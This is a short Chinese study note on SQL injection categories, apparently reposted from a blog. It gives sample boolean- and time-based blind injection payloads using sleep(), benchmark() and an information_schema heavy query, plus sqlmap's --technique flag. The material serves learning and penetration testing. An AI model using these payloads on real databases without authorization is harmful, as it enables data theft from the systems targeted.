2.5 盲注

其他 2020-04-10 18:51:10 阅读次数: 0

SQL注入的分类

  1. 基于报错的注入
  2. 基于布尔类型的盲注
    select length(database())
    select ascii(substr(database(), 1, 1)) >= 115
  3. 基于时间的盲注
    sleep()和benchmark
    if(ascii(substr(database(), 1, 1)) = 115, 1,sleep(3))
    if(ascii(substr(database(), 1, 1)) = 115, 1, benchmark(10000000,md5(1)))
    heavy query通常选用两张较大的表进行笛卡尔积
    select 1 and if(ascii(substr(database(), 1, 1))=115,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C),1)
  4. 宽字节注入
  5. 联合查询
  6. 堆叠注入

sqlmap使用--technique=TECH指定测试类型

--technique=BEUSTQ

默认全选
Boolean-based blind
Error-based
Union query-based
Stacked queries(对文件系统、操作系统、注册表操作时,必须指定该方式)
Time-based blind

猜你喜欢

转载自www.cnblogs.com/TAiiiHu/p/12674997.html
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
周排行
购置笔记本常识
从源码看Spring Security之采坑笔记(Spring Boot篇)
大数据学习——高可用配置案例
如何避免选择不专业的建站公司?
Euclid's Game HDU - 1525(博弈)
面试笔记(六)---Js实现eventHandler
Windows 实例搭建的 FTP 在外网无法连接和访问
设计模式 : 桥接模式
USB 设备驱动开发之几个重要结构体分析
14-p14_sqrt求平方根
每日归档
更多
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022